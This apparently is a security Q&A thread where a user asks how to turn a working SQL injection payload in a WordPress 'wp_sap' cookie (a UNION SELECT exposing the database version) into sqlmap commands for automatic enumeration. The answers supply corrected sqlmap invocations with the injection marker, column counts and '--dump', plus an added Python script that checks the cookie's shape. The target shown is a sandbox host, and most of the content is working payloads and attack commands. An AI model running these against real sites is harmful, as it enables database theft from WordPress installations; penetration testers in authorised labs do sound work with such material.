3

I'm using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

This works great manually. Now, I'd like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I've tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy http://127.0.0.1:8080

sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy http://127.0.0.1:8080

sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy http://127.0.0.1:8080

I'd really appreciate some help to get this working.

schroeder
Rey Bango

2 Answers

4

First of all, MariaDB is supported through the MySQL engine in sqlmap, so the parameter you have there, --dbms "MariaDB", is wrong. There are different reasons why each of your three commands is not working.

  • The first one does not include an injection point.
  • In the second, the suffix you use is wrong, as it misses the double quote that closes the escaped quote from the prefix.
  • In the third, the cookie format is wrong and the suffix is wrong as well.

The reason why it was suggested to use the -r flag is that it reads the request directly from a file, so there are fewer chances to make the mistakes you did.

Eventually you can make this work with a prefix/suffix, with an injection point, with the request from a file, or even with a tamper script. The easiest thing would be the injection point, so here is a command that should work.

sqlmap --url='http://sandbox.local/' --cookie="wp_sap=[\"1650149780')) OR 1=2 *#\"]" --dbms=mysql --union-cols=10-12 --technique U

The * marks the position for the payload, the double quotes are escaped as \", and I specified --union-cols to that value because, as you show, the manual payload that worked has more than 10 columns, and by default sqlmap tests up to 10 without increasing the level. Also, in case the injection does not work with NULL values, you might want to test it with the --union-char=1 parameter!

kampias
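The three failures listed in this answer all come down to how the final cookie value is put together. The added Python below is an illustration written for this page, not sqlmap's own code: it mimics sqlmap's two assembly modes (prefix + payload + suffix, and substitution at the * marker), with a constructed placeholder string standing in for whatever sqlmap would substitute, and then checks whether the assembled wp_sap value still has the shape the question shows (a JSON array holding one string). That last check is an assumption about what the server expects, drawn only from the value in the question. The command variants from the question and from this answer are the inputs; the check shows which ones produce a value that is no longer well-formed before any payload even reaches the database.

```python
import json

# Constructed placeholder for whatever sqlmap would substitute at the
# injection point; it is not a real payload.
PAYLOAD_MARK = "<payload>"


def assemble_prefix_suffix(prefix, suffix, payload=PAYLOAD_MARK):
    """Mimic sqlmap's --prefix/--suffix mode: prefix + payload + suffix."""
    return f"{prefix}{payload}{suffix}"


def assemble_from_marker(template, payload=PAYLOAD_MARK):
    """Mimic sqlmap's '*' injection marker: the first '*' is replaced.
    Raise if there is no marker, mirroring 'no injection point'."""
    if "*" not in template:
        raise ValueError("template has no '*' injection marker")
    return template.replace("*", payload, 1)


def wp_sap_is_well_formed(cookie_value):
    """Assumption for this example: the wp_sap value must parse as a JSON
    array containing exactly one string, as in the question's working value."""
    try:
        parsed = json.loads(cookie_value)
    except json.JSONDecodeError:
        return False
    return isinstance(parsed, list) and len(parsed) == 1 and isinstance(parsed[0], str)


def check_variants():
    """Assemble each command variant from the page and report whether the
    resulting cookie value is still well-formed. Returns {name: bool}."""
    results = {}

    # Question, first command: cookie fragment with --suffix but no '*'.
    try:
        assemble_from_marker("wp_sap=[\"1650149780')) OR 1=2 ")
        results["first_no_marker"] = True
    except ValueError:
        results["first_no_marker"] = False

    # Question, second command: --prefix and --suffix around a bare '*'.
    second = assemble_prefix_suffix("[\"1650149780')) OR 1=2", "11#]")
    results["second_prefix_suffix"] = wp_sap_is_well_formed(second)

    # Question, third command: '*' inside the cookie plus --suffix ",11#]".
    third = assemble_from_marker(
        "[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*"
    ) + ",11#]"
    results["third_marker_plus_suffix"] = wp_sap_is_well_formed(third)

    # This answer's command: '*' followed by the closing #"] inside the cookie.
    answer = assemble_from_marker("[\"1650149780')) OR 1=2 *#\"]")
    results["answer_marker"] = wp_sap_is_well_formed(answer)

    return results


if __name__ == "__main__":
    for name, ok in check_variants().items():
        print(f"{name}: {'well-formed' if ok else 'malformed'}")
```

Running it shows that the second and third variants both lose the closing double quote (the suffix ends in #] rather than #"]), so the cookie is no longer a JSON array, and the first variant has no marker at all; only the form from this answer keeps the value well-formed for any substituted payload that contains no unescaped double quotes.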
2

If you got it manually, then look into doing it again with burp and copying the request. Then pass the request to sqlmap with -r.

For example, say you saved the request to a file called request.txt, your sqlmap would look like this:

sqlmap -r request.txt --dbms=mysql --technique U --union-cols 11 --dump

Note: you have to put a * in request.txt to specify the injection target to sqlmap.

gmelodie
DapperDaniel